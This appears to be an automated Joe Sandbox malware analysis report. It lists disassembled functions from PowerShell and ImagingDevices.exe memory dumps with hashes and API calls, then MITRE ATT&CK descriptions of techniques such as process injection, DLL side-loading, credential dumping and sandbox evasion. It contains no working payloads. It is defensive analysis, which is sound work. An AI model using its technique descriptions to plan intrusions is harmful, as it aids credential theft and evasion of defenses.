Uniqueness Score: -1.00%

Function 072AEC25 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072AECED
4'^q, xrefs: 072AECE1
$^q, xrefs: 072AECC1
$^q, xrefs: 072AEC7B
$^q, xrefs: 072AECB5

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: d96cf9cb4decc52f2f34d0922df76f44e50acd8c1c89dbcd691e480d8f6f79ad
Instruction ID: df87667366967d1a1c4878ebb438644014c59f99ff5fb28404bb983361ef20e0
Opcode Fuzzy Hash: d96cf9cb4decc52f2f34d0922df76f44e50acd8c1c89dbcd691e480d8f6f79ad
Instruction Fuzzy Hash: 6D3157B2F74357AFCB280A688445676BBE7AFC1710B2A446FC406CB245CE36C447C361

Uniqueness

Uniqueness Score: -1.00%

Function 072AAF40 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072AB0EB
$^q, xrefs: 072AB0B6
tP^q, xrefs: 072AB03B
$^q, xrefs: 072AAFB9
$^q, xrefs: 072AAF9D

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 27710fa40c901d7a71cf9e02b48f855fd4665fd6cf7118d80935a0013f0a2db8
Instruction ID: c4d49f149efe0a5aa55451d87f74868cdbf0e157a9b112361bfec6291a83e204
Opcode Fuzzy Hash: 27710fa40c901d7a71cf9e02b48f855fd4665fd6cf7118d80935a0013f0a2db8
Instruction Fuzzy Hash: AF31B0F1A30207FBDB288E55C544B6AB7B2EF85710F14C16AE8259B291C773D984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 072ABF70 Relevance: 5.5, Strings: 4, Instructions: 488COMMON

Download Yara Rule

Strings

(o^q, xrefs: 072AC066
(o^q, xrefs: 072AC399
(o^q, xrefs: 072AC3A9
(o^q, xrefs: 072AC056

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: f56f302bb3a72cc27a5a6473eebef97fc0865c1d73a4174b61955e226772a9cd
Instruction ID: f0a61ef8d13ff9304bd9daea4dbd61e2a85d8627008d5bd8c2d901650a79b31d
Opcode Fuzzy Hash: f56f302bb3a72cc27a5a6473eebef97fc0865c1d73a4174b61955e226772a9cd
Instruction Fuzzy Hash: 43F12AB1724306EFDB159FA8C8447AABBA2EF85310F14847AE505CB391CB72D885C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 072A9F60 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 072A9F8E
$^q, xrefs: 072A9FBC
$^q, xrefs: 072A9FC8
$^q, xrefs: 072A9F72

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 548b774c37c1cbf1976baee406d5bc04891ddb83ceeb9c80020981555d652965
Instruction ID: 610cce030920ee30a2b316f9489f593dfe6ce114e7793b4b6034da959f9be4d2
Opcode Fuzzy Hash: 548b774c37c1cbf1976baee406d5bc04891ddb83ceeb9c80020981555d652965
Instruction Fuzzy Hash: 6B2135B17303076BDB34457A9940B77A6EAAFC0715F24C83AE589CB385CD76E889C361

Uniqueness

Uniqueness Score: -1.00%

Function 072A0308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

$^q, xrefs: 072A035E
$^q, xrefs: 072A0352
4'^q, xrefs: 072A037F
4'^q, xrefs: 072A0373

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 1ed27d1b18fda50b3568c876cf528443c432feaaee15d86cd41e826fd2feb041
Instruction ID: 826d6c8b048611af59b6e52bb8511eac5f28c3a1ac2a6fe987ed328236463db2
Opcode Fuzzy Hash: 1ed27d1b18fda50b3568c876cf528443c432feaaee15d86cd41e826fd2feb041
Instruction Fuzzy Hash: F2019A61A293D65FC33B026819205A66FB25BC3A1072A44DBC080CF667C9258C8D83A7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ImagingDevices.exePID: 7560, Parent PID: 5688COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.8%
Total number of Nodes:	130
Total number of Limit Nodes:	0

Executed Functions

Function 0344F298 Relevance: 3.1, APIs: 2, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 0344F31B

Memory Dump Source

Source File: 00000013.00000002.2863992696.000000000300A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0300A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_300a000_ImagingDevices.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dcc330eaa406069b0f126d94c286591edb827054c552fd42dc41e3324bf88e23
Instruction ID: c3dd86dff0e01e3e853ab7751cb53f1e594a13b3e3c6b074f19e0f61c388c6b1
Opcode Fuzzy Hash: dcc330eaa406069b0f126d94c286591edb827054c552fd42dc41e3324bf88e23
Instruction Fuzzy Hash: A81174B69443008FF704DF32C88DB9977A1EF253A1F5A829ADC524F4A5C368C88ACF15

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002F1C27 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 146
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapSetInformation.KERNEL32(00000000,?,00000000,00000000), ref: 002F1C41
CommandLineToArgvW.SHELL32(?,?), ref: 002F1C5F
StrCmpICW.SHLWAPI(?,InstallWiaDevice), ref: 002F1CB0
StrCmpICW.SHLWAPI(?,WindowHandle), ref: 002F1CCD
wcstoul.MSVCRT ref: 002F1CE9
IsWindow.USER32(00000000), ref: 002F1CF6
StrCmpICW.SHLWAPI(?), ref: 002F1D49
LocalFree.KERNEL32(00000000), ref: 002F1DAB

Strings

WindowHandle, xrefs: 002F1CC4
InstallWiaDevice, xrefs: 002F1CAA

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: ArgvCommandFreeHeapInformationLineLocalWindowwcstoul
String ID: InstallWiaDevice$WindowHandle
API String ID: 3335242896-2263847969
Opcode ID: 512b4ff2a64b51e0885fd7e41f23b77adb3eb7063e86ef10ee7aea2c9896952d
Instruction ID: ec1ac095cb8c4cf59489a7e2696323d3f81e74ca842968a827df6710f9c6fe0a
Opcode Fuzzy Hash: 512b4ff2a64b51e0885fd7e41f23b77adb3eb7063e86ef10ee7aea2c9896952d
Instruction Fuzzy Hash: A3519071E2421EEBDB00DFA4D884ABEF7B5AF04390BA44079DA01E7211D7709D31CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002F1BA9 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(sti_ci.dll), ref: 002F1BB4
GetProcAddress.KERNEL32(00000000,AddDevice), ref: 002F1BC7
GetDesktopWindow.USER32 ref: 002F1BDB
GetLastError.KERNEL32 ref: 002F1BEE
FreeLibrary.KERNEL32(00000000), ref: 002F1C04
GetLastError.KERNEL32 ref: 002F1C0D

Strings

AddDevice, xrefs: 002F1BC1
sti_ci.dll, xrefs: 002F1BAD

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: ErrorLastLibrary$AddressDesktopFreeLoadProcWindow
String ID: AddDevice$sti_ci.dll
API String ID: 3286007962-1561256312
Opcode ID: 0cdafbc769ba65ace57f6ffa135688e8e207e53632e7e03c8a3fa32be3e6806c
Instruction ID: 7b91f0f73e692a5b41ee50fbd98524d52d045779db07abe410daa0282e458d26
Opcode Fuzzy Hash: 0cdafbc769ba65ace57f6ffa135688e8e207e53632e7e03c8a3fa32be3e6806c
Instruction Fuzzy Hash: 36F0A937950526D7833527A87D4CB3BA5949B84FE2751013DFF05E2250DE948C21D5D1

Uniqueness

Uniqueness Score: -1.00%

Function 002F2523 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,002F2659,@0/), ref: 002F252A
UnhandledExceptionFilter.KERNEL32(Y&/,?,002F2659,@0/), ref: 002F2533
GetCurrentProcess.KERNEL32(C0000409,?,002F2659,@0/), ref: 002F253E
TerminateProcess.KERNEL32(00000000,?,002F2659,@0/), ref: 002F2545

Strings

Y&/, xrefs: 002F2530

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: Y&/
API String ID: 3231755760-4095963728
Opcode ID: a94aeec7ea586bef6b4a83580da0a83caf392afd70cbefb8a79ccd8a87409aa2
Instruction ID: c66c60a912707b1ec71201e78bce48b1d1d32f03c46682543ea84d66c3071896
Opcode Fuzzy Hash: a94aeec7ea586bef6b4a83580da0a83caf392afd70cbefb8a79ccd8a87409aa2
Instruction Fuzzy Hash: 84D0C932008104FBC7043BE1FE0CA2E3E28EB442A6F454028F30983031CEB54401CB65

Uniqueness

Uniqueness Score: -1.00%

Function 002F23D5 Relevance: 7.6, APIs: 5, Instructions: 50
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002F2402
GetCurrentProcessId.KERNEL32 ref: 002F2411
GetCurrentThreadId.KERNEL32 ref: 002F241A
GetTickCount.KERNEL32 ref: 002F2423
QueryPerformanceCounter.KERNEL32(?), ref: 002F2438

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: fc41a3a307a6191cf9e3c61cfd504bbeeb148dca2f2427df5d81bd381b2f053f
Instruction ID: a8d8477caf4867a3424e51ae32f446303c33b19c08aba704c1b8d573ca75973e
Opcode Fuzzy Hash: fc41a3a307a6191cf9e3c61cfd504bbeeb148dca2f2427df5d81bd381b2f053f
Instruction Fuzzy Hash: 4D110AB1D11108EBCB14DFB8E94C6AEFBF4EF483A4F51486AD501E7210EA749A04CB44

Uniqueness

Uniqueness Score: -1.00%

Function 002F1788 Relevance: 34.8, APIs: 23, Instructions: 293
comwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000006), ref: 002F17B1
CoInitializeEx.OLE32(00000000,00000004), ref: 002F17C1

Part of subcall function 002F1637: CoCreateInstance.OLE32(002F1140,00000000,00000004,002F1268,?), ref: 002F1668
Part of subcall function 002F1637: SysFreeString.OLEAUT32(?), ref: 002F16A0

memset.MSVCRT ref: 002F17DE
StiCreateInstanceW.STI(002F0000,01000002,?,00000000), ref: 002F1820
SysFreeString.OLEAUT32(?), ref: 002F1867
CoCreateInstance.OLE32(002F1288,00000000,?,002F1248,?), ref: 002F188F
PropertySheetW.COMCTL32(?), ref: 002F18E6
GetLastError.KERNEL32 ref: 002F18F0
LocalFree.KERNEL32(?), ref: 002F190B
LocalFree.KERNEL32(?), ref: 002F1939
CoCreateInstance.OLE32(002F1288,00000000,00000001,002F1228,?), ref: 002F19F5
PropertySheetW.COMCTL32(?), ref: 002F1A46
GetLastError.KERNEL32 ref: 002F1A50
FreePropVariantArray.OLE32(00000001,00000008), ref: 002F1A8E
memset.MSVCRT ref: 002F1ABD
memset.MSVCRT ref: 002F1AD0
LoadStringW.USER32(002F0000,00000067,?,00000064), ref: 002F1AEA
GetLastError.KERNEL32 ref: 002F1AF4
LoadStringW.USER32(002F0000,00000069,?,000001F4), ref: 002F1B20
GetLastError.KERNEL32 ref: 002F1B2A
MessageBoxW.USER32(?,?,?,00000030), ref: 002F1B54
LocalFree.KERNEL32(00000000), ref: 002F1B69
CoUninitialize.OLE32 ref: 002F1B90

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: Free$CreateErrorInstanceLastString$Localmemset$InitializeLoadPropertySheet$ArrayMessagePropUninitializeVariant
String ID:
API String ID: 3915415656-0
Opcode ID: cb5e864f06011675696da926ccd051d0f7facd82b6b4769a3e24cb424641caec
Instruction ID: 600ff4f6f5f6ddf74fd63cc0523698877bb4741e99d16882dc8d880bcc25898e
Opcode Fuzzy Hash: cb5e864f06011675696da926ccd051d0f7facd82b6b4769a3e24cb424641caec
Instruction Fuzzy Hash: 37B18EB1910229DBDB649F14DC48FBAB7B9AB447A1F0100B9E70AA7250DF709DA0CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002F1EB6 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?,002F2668,00000058), ref: 002F1ECB
Sleep.KERNEL32(000003E8), ref: 002F1F00
_amsg_exit.MSVCRT ref: 002F1F15
_initterm.MSVCRT ref: 002F1F69
__IsNonwritableInCurrentImage.LIBCMT ref: 002F1F95
exit.MSVCRT ref: 002F2018

Strings

l3/, xrefs: 002F1EDF
l3/, xrefs: 002F1F80

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID: l3/$l3/
API String ID: 2849151604-555902589
Opcode ID: 7f0a669457d458266e9fbd9e1a7dd346aee144c874bf5dc6eedc566d3d3e6b59
Instruction ID: 0f2c6f37fa5006ece7acccd0382d5d41566f3646fb3e4be1da34bd4953236976
Opcode Fuzzy Hash: 7f0a669457d458266e9fbd9e1a7dd346aee144c874bf5dc6eedc566d3d3e6b59
Instruction Fuzzy Hash: CA41B471A6431EDBDB25DF64E809B79F6A0BB057E1F50023EEB0196690DF708971CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002F1530 Relevance: 9.1, APIs: 6, Instructions: 89
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000006), ref: 002F154F
CoInitializeEx.OLE32(00000000,00000004), ref: 002F155E
CoCreateInstance.OLE32(002F1120,00000000,?,002F1278,?), ref: 002F1588
memset.MSVCRT ref: 002F15A1
LoadStringW.USER32(002F0000,00000067,?,00000104), ref: 002F15BC
CoUninitialize.OLE32(?,0001000F,00000000,00000000), ref: 002F1620

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: Initialize$CreateInstanceLoadStringUninitializememset
String ID:
API String ID: 1378852383-0
Opcode ID: d459e2ac029132138dc87fe54b151ca5bf9efbd850dee6c79bab6e770cfcd65a
Instruction ID: abd52c631a47cf58b19779655c511bdfa0ef420866033fb087a1e20895e2eb02
Opcode Fuzzy Hash: d459e2ac029132138dc87fe54b151ca5bf9efbd850dee6c79bab6e770cfcd65a
Instruction Fuzzy Hash: 35218275650228ABD714DB14EC4DFABBB79EB847A0F140079FB09D7280DEB09D51CA90

Uniqueness

Uniqueness Score: -1.00%

Function 002F1637 Relevance: 6.1, APIs: 4, Instructions: 127
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(002F1140,00000000,00000004,002F1268,?), ref: 002F1668
SysFreeString.OLEAUT32(?), ref: 002F16A0
CoCreateInstance.OLE32(002F1130,00000000,00000004,002F1258,?), ref: 002F16F7
SysFreeString.OLEAUT32(?), ref: 002F172D

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: CreateFreeInstanceString
String ID:
API String ID: 586785272-0
Opcode ID: 70653782ac57af2e19c8a5fa21b29fd23aa8d55ba762794449aa581178249584
Instruction ID: a49d1c987cdbb1d846486706cf20ef13e408a6dbf885be606e14a074c68e260c
Opcode Fuzzy Hash: 70653782ac57af2e19c8a5fa21b29fd23aa8d55ba762794449aa581178249584
Instruction Fuzzy Hash: 15415035A10218EFCB04EF94D848A7EB7B9FF897A1B540069EA06E7250DB70AD21DB50

Uniqueness

Uniqueness Score: -1.00%

Function 002F1E10 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002F2238: GetModuleHandleW.KERNEL32(00000000), ref: 002F223F

__set_app_type.MSVCRT ref: 002F1E22
__p__fmode.MSVCRT ref: 002F1E38
__p__commode.MSVCRT ref: 002F1E46
__setusermatherr.MSVCRT ref: 002F1E67

Memory Dump Source

Source File: 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000013.00000002.2863944379.00000000002F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.2863974852.00000000002F4000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f0000_ImagingDevices.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: a798e49effbfd7803102408beabd11b1ffdc9b5daf4842fbd85b62dc4cf7dd59
Instruction ID: fe44788d7a33a50a2339c66b11d64bdc528443a6910ce95ef351e94ab81a162b
Opcode Fuzzy Hash: a798e49effbfd7803102408beabd11b1ffdc9b5daf4842fbd85b62dc4cf7dd59
Instruction Fuzzy Hash: 97F0D470515305DFD718EB70BC0EA35BB60B7163F1B10063EEA61862E1CF758654CE14

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
